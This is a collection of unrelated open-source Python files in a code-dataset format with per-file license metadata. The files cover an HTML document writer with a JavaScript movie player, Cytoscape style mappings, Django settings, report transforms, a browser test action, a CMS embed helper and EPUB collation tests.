</body>
</html>
"""
self.file.write(s)
def title(self, title, authors_and_institutions=[], date='today'):
s = """
<title>%s</title>
<center><h1>%s</h1></center>
""" % (title, title)
for ai in authors_and_institutions:
author = ai[0]
s += """
<center>
<h4>%s</h4>""" % author
for inst in ai[1:]:
s += """
<h6>%s</h6>""" % inst
s += """\n</center>\n\n"""
if date is not None:
if date == 'today':
date = self.today_date()
s += """<center>%s</center>\n\n\n""" % date
self.file.write(s)
self.paragraph_separator()
def heading(self, level, title, label=None):
if label is None:
s = """\n<h%d>%s</h%d>\n""" % (level, title, level)
else:
s = """\n<h%d><a href="%s">%s</h%d>\n""" % \
(level, label, title, level)
self.file.write(s)
def section(self, title, label=None):
self.heading(1, title, label)
def subsection(self, title, label=None):
self.heading(3, title, label)
def subsubsection(self, title, label=None):
self.heading(4, title, label)
def paragraph(self, title, ending='.', label=None):
s = '\n\n<p><!-- paragraph with heading -->\n<b>%s%s</b>\n' \
% (title, ending)
if label is not None:
s += '<a name="%s">\n' % label
self.file.write(s)
def paragraph_separator(self):
self.file.write('\n<p>\n')
def text(self, text, indent=0):
text = _BaseWriter.text(self, text, indent)
text = _BaseWriter.expandtext(self, text,
INLINE_TAGS, HTML.INLINE_TAGS_SUBST)
self.file.write(text)
def list(self, items, listtype='itemize'):
self.unfold_list(items, self.item_handler, listtype)
def item_handler(self, item, listtype, level, keyword=None):
indent = ' '*level
s = ''
if item == '_begin':
if listtype == 'itemize':
s += '\n%s<ul>' % indent
elif listtype == 'enumerate':
s += '\n%s<ol>' % indent
elif listtype == 'description':
s += '\n%s<dl>' % indent
s += ' <!-- start of "%s" list -->\n' % listtype
elif item == '_end':
if listtype == 'itemize':
s += '%s</ul>' % indent
elif listtype == 'enumerate':
s += '%s</ol>' % indent
elif listtype == 'description':
s += '%s</dl>' % indent
s += ' <!-- end of "%s" list -->\n' % listtype
else:
# ordinary item:
if item is not None:
if listtype in ('itemize', 'enumerate'):
s += '%s%s<p><li> %s\n' % (indent, indent, item)
else:
s += '%s%s<p><dt>%s</dt><dd>%s</dd>\n' % \
(indent, indent, keyword, item)
self.file.write(s)
def verbatim(self, code):
self.file.write('\n<pre>' + r'%s' % code + '\n</pre>\n')
def figure(self, filename, caption, width=None, height=None, label=None):
filename = self.figure_conversion(filename, ('.jpg', '.gif', '.png'))
if width:
width = ' width=%s ' % width
else:
width = ''
if height:
height = ' width=%s ' % width
else:
height = ''
s = '\n<hr><img src="%s"%s%s>\n<p><em>%s</em>\n<hr><p>\n' % \
(filename, width, height, caption)
self.file.write(s)
def table(self, table, column_headline_pos='c', column_pos='c'):
s = '\n<p>\n<table border="%s" cellpadding="%s" cellspacing="%s">\n' %\
(HTML.table_border, HTML.table_cellpadding, HTML.table_cellspacing)
for line in table:
s += '<tr>'
for column in line:
s += '<td>%s</td>' % column
s += '</tr>\n'
s += '</table>\n\n'
self.file.write(s)
def url(self, url_address, link_text=None):
if link_text is None:
link_text = url_address
self.file.write('\n<a href="%s">%s</a>\n' % (url_address, link_text))
def link(self, link_text, link_target):
self.file.write('\n<a href="%s">%s</a>\n' % (link_text, link_target))
# autogenerate doc strings by combining parent class doc strings
# with subclass doc strings:
for method in [title, section, subsection, subsubsection,
paragraph, text,
verbatim, # not defined here: math, raw,
figure, table, url,
list, item_handler,]:
method.__doc__ = makedocstr(_BaseWriter, method)
class LaTeX(_BaseWriter):
def __init__(self):
raise NotImplementedError, \
'Use DocOnce class instead and filter to LaTeX'
# Efficient way of generating class DocWriter.
# A better way (for pydoc and other API references) is to
# explicitly list all methods and their arguments and then add
# the body for writer in self.writers: writer.method(arg1, arg2, ...)
class DocWriter:
"""
DocWriter can write documents in several formats at once.
"""
methods = 'title', 'section', 'subsection', 'subsubsection', \
'paragraph', 'paragraph_separator', 'text', 'list', \
'verbatim', 'math', 'raw', 'url', 'link', \
'write_to_file', 'figure', 'table',
def __init__(self, *formats):
"""
@param formats: sequence of strings specifying the desired formats.
"""
self.writers = [eval(format)() for format in formats]
def documents(self):
return [writer.document for writer in self.writers]
def __str__(self):
s = ''
for writer in self.writers:
s += '*'*60 + \
'\nDocWriter: format=%s (without footer)\n' % \
writer.__class__.__name__ + '*'*60
s += str(writer)
return s
def dispatcher(self, *args, **kwargs):
#print 'in dispatcher for', self.method_name, 'with args', args, kwargs
#self.history = (self.method_name, args, kwargs)
for writer in self.writers:
s = getattr(writer, self.method_name)(*args, **kwargs)
'''
Alternative to attaching separate global functions:
def __getattribute__(self, name):
print 'calling __getattribute__ with', name
if name in DocWriter.methods:
self.method_name = name
return self.dispatcher
else:
return object.__getattribute__(self, name)
# can use inspect module to extract doc of all methods and
# put this doc in __doc__
'''
# Autogenerate methods in class DocWriter (with right
# method signature and doc strings stolen from class _BaseWriter (!)):
import inspect
def func_to_method(func, class_, method_name=None):
setattr(class_, method_name or func.__name__, func)
for method in DocWriter.methods:
docstring = eval('_BaseWriter.%s.__doc__' % method)
# extract function signature:
a = inspect.getargspec(eval('_BaseWriter.%s' % method))
if a[3] is not None: # keyword arguments?
kwargs = ['%s=%r' % (arg, value) \
for arg, value in zip(a[0][-len(a[3]):], a[3])]
args = a[0][:-len(a[3])]
allargs = args + kwargs
else:
allargs = a[0]
#print method, allargs, '\n', a
signature_def = '%s(%s)' % (method, ', '.join(allargs))
signature_call = '%s(%s)' % (method, ', '.join(a[0][1:])) # exclude self
code = """\
def _%s:
'''\
%s
'''
for writer in self.writers:
writer.%s
func_to_method(_%s, DocWriter, '%s')
""" % (signature_def, docstring, signature_call, method, method)
#print 'Autogenerating\n', code
exec code
def html_movie(plotfiles, interval_ms=300, width=800, height=600,
casename=None):
"""
Takes a list plotfiles, such as::
'frame00.png', 'frame01.png', ...
and creates javascript code for animating the frames as a movie in HTML.
The `plotfiles` argument can be of three types:
* A Python list of the names of the image files, sorted in correct
order. The names can be filenames of files reachable by the
HTML code, or the names can be URLs.
* A filename generator using Unix wildcard notation, e.g.,
``frame*.png`` (the files most be accessible for the HTML code).
* A filename generator using printf notation for frame numbering
and limits for the numbers. An example is ``frame%0d.png:0->92``,
which means ``frame00.png``, ``frame01.png``, ..., ``frame92.png``.
This specification of `plotfiles` also allows URLs, e.g.,
``http://mysite.net/files/frames/frame_%04d.png:0->320``.
If `casename` is None, a casename based on the full relative path of the
first plotfile is used as tag in the variables in the javascript code
such that the code for several movies can appear in the same file
(i.e., the various code blocks employ different variables because
the variable names differ).
The returned result is text strings that incorporate javascript to
loop through the plots one after another. The html text also features
buttons for controlling the movie.
The parameter `iterval_ms` is the time interval between loading
successive images and is in milliseconds.
The `width` and `height` parameters do not seem to have any effect
for reasons not understood.
The following strings are returned: header, javascript code, form
with movie and buttons, footer, and plotfiles::
header, jscode, form, footer, plotfiles = html_movie('frames*.png')
# Insert javascript code in some HTML file
htmlfile.write(jscode + form)
# Or write a new standalone file that act as movie player
filename = plotfiles[0][:-4] + '.html'
htmlfile = open(filename, 'w')
htmlfile.write(header + jscode + form + footer)
htmlfile.close
This function is based on code written by R. J. LeVeque, based on
a template from Alan McIntyre.
"""
# Alternative method:
# http://stackoverflow.com/questions/9486961/animated-image-with-javascript
# Start with expanding plotfiles if it is a filename generator
if not isinstance(plotfiles, (tuple,list)):
if not isinstance(plotfiles, (str,unicode)):
raise TypeError('plotfiles must be list or filename generator, not %s' % type(plotfiles))
filename_generator = plotfiles
if '*' in filename_generator:
# frame_*.png
if filename_generator.startswith('http'):
raise ValueError('Filename generator %s cannot contain *; must be like http://some.net/files/frame_%%04d.png:0->120' % filename_generator)
plotfiles = glob.glob(filename_generator)
if not plotfiles:
raise ValueError('No plotfiles on the form %s' %
filename_generator)
plotfiles.sort()
elif '->' in filename_generator:
# frame_%04d.png:0->120
# http://some.net/files/frame_%04d.png:0->120
p = filename_generator.split(':')
filename = ':'.join(p[:-1])
if not re.search(r'%0?\d+', filename):
raise ValueError('Filename generator %s has wrong syntax; missing printf specification as in frame_%%04d.png:0->120' % filename_generator)
if not re.search(r'\d+->\d+', p[-1]):
raise ValueError('Filename generator %s has wrong syntax; must be like frame_%%04d.png:0->120' % filename_generator)
p = p[-1].split('->')
lo, hi = int(p[0]), int(p[1])
plotfiles = [filename % i for i in range(lo,hi+1,1)]
# Check that the plot files really exist, if they are local on the computer
if not plotfiles[0].startswith('http'):
missing_files = [fname for fname in plotfiles
if not os.path.isfile(fname)]
if missing_files:
raise ValueError('Missing plot files: %s' %
str(missing_files)[1:-1])
if casename is None:
# Use plotfiles[0] as the casename, but remove illegal
# characters in variable names since the casename will be
# used as part of javascript variable names.
casename = os.path.splitext(plotfiles[0])[0]
# Use _ for invalid characters
casename = re.sub('[^0-9a-zA-Z_]', '_', casename)
# Remove leading illegal characters until we find a letter or underscore
casename = re.sub('^[^a-zA-Z_]+', '', casename)
filestem, ext = os.path.splitext(plotfiles[0])
if ext == '.png' or ext == '.jpg' or ext == '.jpeg' or ext == 'gif':
pass
else:
raise ValueError('Plotfiles (%s, ...) must be PNG, JPEG, or GIF files with '\
'extension .png, .jpg/.jpeg, or .gif' % plotfiles[0])
header = """\
<html>
<head>
</head>
<body>
"""
no_images = len(plotfiles)
jscode = """
<script language="Javascript">
<!---
var num_images_%(casename)s = %(no_images)d;
var img_width_%(casename)s = %(width)d;
var img_height_%(casename)s = %(height)d;
var interval_%(casename)s = %(interval_ms)d;
var images_%(casename)s = new Array();
function preload_images_%(casename)s()
{
t = document.getElementById("progress");
""" % vars()
i = 0
for fname in plotfiles:
jscode += """
t.innerHTML = "Preloading image ";
images_%(casename)s[%(i)s] = new Image(img_width_%(casename)s, img_height_%(casename)s);
images_%(casename)s[%(i)s].src = "%(fname)s";
""" % vars()
i = i+1
jscode += """
t.innerHTML = "";
}
function tick_%(casename)s()
{
if (frame_%(casename)s > num_images_%(casename)s - 1)
frame_%(casename)s = 0;
document.name_%(casename)s.src = images_%(casename)s[frame_%(casename)s].src;
frame_%(casename)s += 1;
tt = setTimeout("tick_%(casename)s()", interval_%(casename)s);
}
function startup_%(casename)s()
{
preload_images_%(casename)s();
frame_%(casename)s = 0;
setTimeout("tick_%(casename)s()", interval_%(casename)s);
}
function stopit_%(casename)s()
{ clearTimeout(tt); }
function restart_%(casename)s()
{ tt = setTimeout("tick_%(casename)s()", interval_%(casename)s); }
function slower_%(casename)s()
{ interval_%(casename)s = interval_%(casename)s/0.7; }
function faster_%(casename)s()
{ interval_%(casename)s = interval_%(casename)s*0.7; }
// --->
</script>
""" % vars()
plotfile0 = plotfiles[0]
form = """
<form>
<input type="button" value="Start movie" onClick="startup_%(casename)s()">
<input type="button" value="Pause movie" onClick="stopit_%(casename)s()">
<input type="button" value="Restart movie" onClick="restart_%(casename)s()">
<input type="button" value="Slower" onClick="slower_%(casename)s()">
<input type="button" value="Faster" onClick="faster_%(casename)s()">
</form>
<p><div ID="progress"></div></p>
<img src="%(plotfile0)s" name="name_%(casename)s" border=2/>
""" % vars()
footer = '\n</body>\n</html>\n'
return header, jscode, form, footer, plotfiles
def html_movie_embed(moviefile, width=400, height=400):
"""
Return HTML for embedding a moviefile using the default
handling of such files.
"""
text = """
<embed src="%(moviefile)s"
width="%(width)s"
height="%(height)s"
autoplay="false"
loop="true">
</embed>
""" % vars()
return text
def html_movie_embed_wmp(moviefile, width=400, height=400):
"""Return HTML text for embedding a movie file
(Windows Media Player code)."""
text = """
<object id="MediaPlayer1" width="180" height="200"
classid="CLSID:22D6F312-B0F6-11D0-94AB-0080C74C7E95"
codebase="http://activex.microsoft.com/activex/controls/mplayer/en/nsmp2inf.cab#Version=5,1,52,701"
standby="Loading Microsoft Windows Media Player components..."
type="application/x-oleobject" align="middle">
<param name="FileName" value="%(moviefile)s">
<param name="ShowStatusBar" value="True">
<param name="DefaultFrame" value="mainFrame">
<param name="autostart" value="false">
<embed type="application/x-mplayer2"
pluginspage = "http://www.microsoft.com/Windows/MediaPlayer/"
src="%(moviefile)s"
autostart="false"
align="middle"
width="%(width)s"
height="%(height)s"
loop="100"
defaultframe="rightFrame"
showstatusbar="true">
</embed>
</object>
<!--
<a href="%(moviefile)s"><font size="2">Download movie file</font></a>
<a href="http://www.microsoft.com/windows/windowsmedia/mp10/default.aspx">
<font size="1">Download Windows Media Player</font></a></p>
-->
<!--
Attributes of the <embed> tag are:
src - tells what file to use.
autostart="true" - tells the computer to start the Video playing upon loading the page.
autostart="false" - tells the computer not to start the Video playing upon loading the page. You must click the start button to make the Video play.
align=middle - tells the computer to put the start/stop buttons to the middle.
width= and height= - are the dimensions of a small button panel that will appear when the page loads and contains both a START & STOP button so the visitor can start/stop the Video.
loop=2 - will play the Video for two complete loops.
-->
""" % vars()
return text
def html_movie_embed_qt(moviefile, width=400, height=400):
"""Return HTML for embedding a moviefile (QuickTime code)."""
text = """
<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"
codebase="http://www.apple.com/qtactivex/qtplugin.cab"
width="%(width)s" height="%(height)s" >
<param name="src" value="%(moviefile)s" >
<param name="autoplay" value="false" >
<embed src="%(moviefile)s"
pluginspage="http://www.apple.com/quicktime/download"
width="%(width)s" height="%(height)s" autoplay="false">
</embed>
</object>
""" % vars()
return text
def _test(d):
# d is formatclass() or DocWriter(HTML, LaTeX, ...)
print '\n\n', '*'*70, \
'\n*** Testing class "%s"\n' % d.__class__.__name__, '*'*70
d.title('My Test of Class %s' % d.__class__.__name__,
[('Hans Petter Langtangen',
'Simula Research Laboratory',
'Dept. of Informatics, Univ. of Oslo'),
])
d.section('First Section')
d.text("""
Here is some
text for section 1.
This is a *first* example of using the _DocWriter
module_ for writing documents from *Python* scripts.
It could be a nice tool since we do not need to bother
with special typesetting, such as `fixed width fonts`
in plain text.
""")
d.subsection('First Subsection')
d.text('Some text for the subsection.')
d.paragraph('Test of a Paragraph')
d.text("""
Some paragraph text taken from "Documenting Python": The Python language
has a substantial body of documentation, much of it contributed by various
authors. The markup used for the Python documentation is based on
LaTeX and requires a significant set of macros written specifically
for documenting Python. This document describes the macros introduced
to support Python documentation and how they should be used to support
a wide range of output formats.
This document describes the document classes and special markup used
in the Python documentation. Authors may use this guide, in
conjunction with the template files provided with the distribution, to
create or maintain whole documents or sections.
If you're interested in contributing to Python's documentation,
there's no need to learn LaTeX if you're not so inclined; plain text
contributions are more than welcome as well.
""")
d.text('Here is an enumerate list:')
samplelist = ['item1', 'item2',
['subitem1', 'subitem2'],
'item3',
['subitem3', 'subitem4']]
d.list(samplelist, listtype='enumerate')
d.text('...with some trailing text.')
d.subsubsection('First Subsubsection with an Itemize List')
d.list(samplelist, listtype='itemize')
d.text('Here is some Python code:')
d.verbatim("""
class A:
pass
class B(A):
pass
b = B()
b.item = 0 # create a new attribute
""")
d.section('Second Section')
d.text('Here is a description list:')
d.list(['keyword1: item1', 'keyword2: item2 goes here, with a colon : and some text after',
['key3: subitem1', 'key4: subitem2'],
'key5: item3',
['key6: subitem3', 'key7: subitem4']],
listtype='description')
d.paragraph_separator()
d.text('And here is a table:')
d.table([['a', 'b'], ['c', 'd'], ['e', 'and a longer text']])
print d
d.write_to_file('tmp_%s' % d.__class__.__name__)
if __name__ == '__main__':
formats = HTML, DocOnce
for format in formats:
d = format()
_test(d)
formats_str = [format.__name__ for format in formats]
d = DocWriter(*formats_str)
_test(d)
| bsd-3-clause | 2,413,235,996,077,832,000 | 35.289572 | 181 | 0.585863 | false | 3.764973 | false | false | false |
idekerlab/py2cytoscape | py2cytoscape/data/style.py | 1 | 6533 | from . import BASE_URL, HEADERS
import requests
import json
import pandas as pd
import warnings
warnings.warn('\n\n\n**** data.style will be deprecated in the next py2cytoscape release. ****\n\n\n')
class Style(object):
def __init__(self, name):
# Validate required argument
if name is None:
raise ValueError("Style name is required.")
else:
self.__name = name
self.__url = BASE_URL + 'styles/' + str(name) + '/'
def get_name(self):
"""
Get immutable name of this Visual Style.
:return: Style name as string
"""
return self.__name
def __get_new_mapping(self, mapping_type, column=None, col_type='String',
vp=None):
if column is None or vp is None:
raise ValueError('both column name and visual property are required.')
new_maping = {
'mappingType': mapping_type,
'mappingColumn': column,
'mappingColumnType': col_type,
'visualProperty': vp
}
return new_maping
def create_discrete_mapping(self, column=None, col_type='String',
vp=None, mappings=None):
self.__call_create_mapping(
self.__get_discrete(column=column, col_type=col_type, vp=vp,
mappings=mappings))
def create_continuous_mapping(self, column=None, col_type='String',
vp=None, points=None):
self.__call_create_mapping(
self.__get_continuous(column=column, col_type=col_type, vp=vp,
points=points))
def create_passthrough_mapping(self, column=None, col_type='String',
vp=None):
self.__call_create_mapping(
self.__get_passthrough(column=column, col_type=col_type, vp=vp))
def __call_create_mapping(self, mapping):
url = self.__url + 'mappings'
requests.post(url, data=json.dumps([mapping]), headers=HEADERS)
def __get_passthrough(self, column=None, col_type='String', vp=None):
return self.__get_new_mapping('passthrough', column=column,
col_type=col_type, vp=vp)
def __get_discrete(self, column=None, col_type='String', vp=None,
mappings=None):
new_mapping = self.__get_new_mapping('discrete', column=column,
col_type=col_type, vp=vp)
if mappings is None:
raise ValueError('key-value pair object (mappings) is required.')
body = [{'key': key, 'value': mappings[key]} for key in mappings.keys()]
new_mapping['map'] = body
return new_mapping
def __get_continuous(self, column=None, col_type='String', vp=None,
points=None):
if points is None:
raise ValueError('key-value pair object (mappings) is required.')
new_mapping = self.__get_new_mapping('continuous', column=column,
col_type=col_type, vp=vp)
new_mapping['points'] = points
return new_mapping
def get_mapping(self, vp=None):
if vp is None:
raise ValueError('Visual Property ID is required.')
url = self.__url + 'mappings/' + vp
return requests.get(url).json()
def get_mappings(self):
url = self.__url + 'mappings'
return requests.get(url).json()
def get_default(self, vp=None):
if vp is None:
raise ValueError('Visual Property ID is required.')
url = self.__url + 'defaults/' + vp
key_value_pair = requests.get(url).content
print(key_value_pair)
key2 = requests.get(url).json()
key_value_pair = key2
return pd.Series({key_value_pair['visualProperty']: key_value_pair[
'value']})
def get_defaults(self):
url = self.__url + 'defaults'
result = requests.get(url).json()['defaults']
vals = {entry['visualProperty']: entry['value'] for entry in result}
return pd.Series(vals)
def update_defaults(self, prop_value_dict):
"""
Updates the value of one or more visual properties.
:param prop_value_dict: Dictionary containing, for each visual property,
the new value to use.
"""
body = []
for key in prop_value_dict:
entry = {
'visualProperty': key,
'value': prop_value_dict[key]
}
body.append(entry)
url = self.__url + 'defaults'
requests.put(url, data=json.dumps(body), headers=HEADERS)
# Delete Methods
def delete_mapping(self, vp=None):
if vp is None:
return
url = self.__url + 'mappings/' + vp
requests.delete(url)
def delete_mappings(self):
url = self.__url + 'mappings'
requests.delete(url)
class StyleUtil(object):
def create_point(value, lesser, equal, greater):
return [
{
'value': str(value),
'lesser': lesser,
'equal': equal,
'greater': greater
}
]
def create_2_color_gradient(min=0, max=10, colors=('red', 'green')):
point_1 = StyleUtil.create_point(min, colors[0], colors[0], colors[0])
point_2 = StyleUtil.create_point(max, colors[1], colors[1], colors[1])
return point_1 + point_2
def create_3_color_gradient(min=-5, mid=0, max=5, colors=('blue', 'white', 'red')):
# can be updated to use StyleUtil.create_point like in create_point
points = [
{
'value': str(min),
'lesser': colors[0],
'equal': colors[0],
'greater': colors[0],
},
{
'value': str(mid),
'lesser': colors[1],
'equal': colors[1],
'greater': colors[1],
},
{
'value': str(max),
'lesser': colors[2],
'equal': colors[2],
'greater': colors[2]
}
]
return points
def create_slope(min=0, max=10, values=(1, 10)):
point_1 = StyleUtil.create_point(min, values[0], values[0], values[0])
point_2 = StyleUtil.create_point(max, values[1], values[1], values[1])
return point_1 + point_2
| mit | 7,537,577,756,058,937,000 | 32.849741 | 102 | 0.529772 | false | 4.045201 | false | false | false |
srmagura/goodnight-lead | goodnight_lead/settings/common.py | 1 | 2349 | """LEAD common settings."""
# Imports
from pathlib import Path
# Project base directory
BASE_DIR = Path(__file__).absolute().parent.parent.parent
# Installed applications
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'ckeditor',
'gl_site'
)
# Configure middleware
MIDDLEWARE = (
# Security
'django.middleware.security.SecurityMiddleware',
# Whitenoise
'whitenoise.middleware.WhiteNoiseMiddleware',
# Other
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
)
# Honor the 'X-Forwarded-Proto' header for request.is_secure()
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
# Set Root url
ROOT_URLCONF = 'goodnight_lead.urls'
# Set WSGI application path
WSGI_APPLICATION = 'goodnight_lead.wsgi.application'
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static asset configuration
STATIC_ROOT = 'staticfiles'
STATIC_URL = '/static/'
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
STATICFILES_DIRS = (BASE_DIR / 'static',)
# We don't currently support uploading images from ckeditor, but we still
# need to define this variable
CKEDITOR_UPLOAD_PATH = 'ckeditor_uploads/'
# Default url for login page (override django default)
LOGIN_URL = '/login'
# Template configuration
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
]
},
},
]
| gpl-3.0 | -363,059,362,030,304,300 | 22.727273 | 79 | 0.702427 | false | 3.734499 | false | false | false |
qedsoftware/commcare-hq | corehq/apps/userreports/transforms/specs.py | 1 | 2806 | from decimal import Decimal
from dimagi.ext.jsonobject import DictProperty, JsonObject, StringProperty
from corehq.apps.userreports.specs import TypeProperty
from corehq.apps.userreports.transforms.custom.date import get_month_display, days_elapsed_from_date
from corehq.apps.userreports.transforms.custom.numeric import \
get_short_decimal_display
from corehq.apps.userreports.transforms.custom.users import (
get_user_display,
get_owner_display,
get_user_without_domain_display,
)
class Transform(JsonObject):
"""
Transforms provide an interface to take in an input value and output something else.
Useful if you need to transform data before saving or displaying it in some way.
"""
type = StringProperty(required=True, choices=['custom'])
_CUSTOM_TRANSFORM_MAP = {
'month_display': get_month_display,
'days_elapsed_from_date': days_elapsed_from_date,
'user_display': get_user_display,
'owner_display': get_owner_display,
'user_without_domain_display': get_user_without_domain_display,
'short_decimal_display': get_short_decimal_display,
}
class CustomTransform(JsonObject):
"""
Custom transforms provide an interface to a limited set of known, custom operations
to transform data. Examples of custom transforms include things like looking up a username
or owner name from the ID.
"""
type = TypeProperty('custom')
custom_type = StringProperty(required=True, choices=_CUSTOM_TRANSFORM_MAP.keys())
def get_transform_function(self):
return _CUSTOM_TRANSFORM_MAP[self.custom_type]
def transform(self, value):
return self.get_transform_function()(value)
class DateFormatTransform(Transform):
type = TypeProperty('date_format')
format = StringProperty(required=True)
def get_transform_function(self):
def transform_function(value):
try:
return value.strftime(self.format)
except Exception:
return value
return transform_function
class NumberFormatTransform(Transform):
type = TypeProperty('number_format')
format_string = StringProperty(required=True)
def get_transform_function(self):
def transform_function(value):
try:
if isinstance(value, basestring):
value = Decimal(value)
return self.format_string.format(value)
except Exception:
return value
return transform_function
class TranslationTransform(Transform):
type = TypeProperty('translation')
translations = DictProperty()
def get_transform_function(self):
# For now, use the identity function
def transform_function(value):
return value
return transform_function
| bsd-3-clause | 863,535,659,692,166,900 | 30.177778 | 100 | 0.692801 | false | 4.350388 | false | false | false |
gazfm/CaptureRoyaleTestServer | CaptureRoyalTestServer/settings.py | 1 | 2760 | """
Django settings for CaptureRoyalTestServer project.
Generated by 'django-admin startproject' using Django 1.8.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'y&nd31a-z5c9@rgp-p47wvettq@%38(p9g7%oq#*q=2-aa$m5f'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'caproy',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'CaptureRoyalTestServer.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'CaptureRoyalTestServer.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
TEMPLATE_DIRS = (
os.path.join(BASE_DIR, 'templates'),
) | apache-2.0 | 1,262,952,607,708,974,000 | 24.803738 | 71 | 0.693841 | false | 3.445693 | false | false | false |
Evervolv/android_external_chromium_org | tools/telemetry/telemetry/page/actions/click_element.py | 33 | 1716 | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from telemetry.core import util
from telemetry.core import exceptions
from telemetry.page import page as page_module
from telemetry.page.actions import page_action
class ClickElementAction(page_action.PageAction):
def __init__(self, attributes=None):
super(ClickElementAction, self).__init__(attributes)
def RunAction(self, page, tab, previous_action):
def DoClick():
assert hasattr(self, 'selector') or hasattr(self, 'text')
if hasattr(self, 'selector'):
code = 'document.querySelector(\'' + self.selector + '\').click();'
try:
tab.ExecuteJavaScript(code)
except exceptions.EvaluateException:
raise page_action.PageActionFailed(
'Cannot find element with selector ' + self.selector)
else:
callback_code = 'function(element) { element.click(); }'
try:
util.FindElementAndPerformAction(tab, self.text, callback_code)
except exceptions.EvaluateException:
raise page_action.PageActionFailed(
'Cannot find element with text ' + self.text)
if hasattr(self, 'wait_for_navigate'):
tab.PerformActionAndWaitForNavigate(DoClick)
elif hasattr(self, 'wait_for_href_change'):
old_url = tab.EvaluateJavaScript('document.location.href')
DoClick()
util.WaitFor(lambda: tab.EvaluateJavaScript(
'document.location.href') != old_url, 60)
else:
DoClick()
page_module.Page.WaitForPageToLoad(self, tab, 60)
tab.WaitForDocumentReadyStateToBeInteractiveOrBetter()
| bsd-3-clause | -2,990,962,649,633,745,400 | 39.857143 | 75 | 0.68648 | false | 4.07601 | false | false | false |
5monkeys/djedi-cms | djedi/utils/templates.py | 1 | 1151 | import json
from django.core.exceptions import ImproperlyConfigured
from ..compat import NoReverseMatch, render, render_to_string, reverse
def render_embed(nodes=None, request=None):
context = {}
if nodes is None:
try:
prefix = request.build_absolute_uri("/").rstrip("/")
context.update(
{
"cms_url": prefix + reverse("admin:djedi:cms"),
"exclude_json_nodes": True,
}
)
output = render(request, "djedi/cms/embed.html", context)
except NoReverseMatch:
raise ImproperlyConfigured(
"Could not find djedi in your url conf, "
"enable django admin or include "
"djedi.urls within the admin namespace."
)
else:
context.update(
{
"cms_url": reverse("admin:djedi:cms"),
"exclude_json_nodes": False,
"json_nodes": json.dumps(nodes).replace("</", "\\x3C/"),
}
)
output = render_to_string("djedi/cms/embed.html", context)
return output
| bsd-3-clause | -2,862,257,654,988,312,000 | 29.289474 | 72 | 0.523892 | false | 4.513725 | false | false | false |
Connexions/cnx-epub | cnxepub/tests/test_collation.py | 1 | 13693 | # -*- coding: utf-8 -*-
# ###
# Copyright (c) 2016, Rice University
# This software is subject to the provisions of the GNU Affero General
# Public License version 3 (AGPLv3).
# See LICENCE.txt for details.
# ###
import os
import io
import unittest
try:
from unittest import mock
except ImportError:
import mock
from lxml import etree
from .test_models import BaseModelTestCase
here = os.path.abspath(os.path.dirname(__file__))
TEST_DATA_DIR = os.path.join(here, 'data')
class ReconstituteTestCase(unittest.TestCase):
maxDiff = None
def test_xhtml(self):
page_path = os.path.join(TEST_DATA_DIR, 'desserts-single-page.xhtml')
with open(page_path) as html:
from cnxepub.collation import reconstitute
desserts = reconstitute(html)
self.check_desserts(desserts)
def test_html(self):
page_path = os.path.join(TEST_DATA_DIR, 'desserts-single-page.html')
with open(page_path) as html:
from cnxepub.collation import reconstitute
desserts = reconstitute(html)
self.check_desserts(desserts)
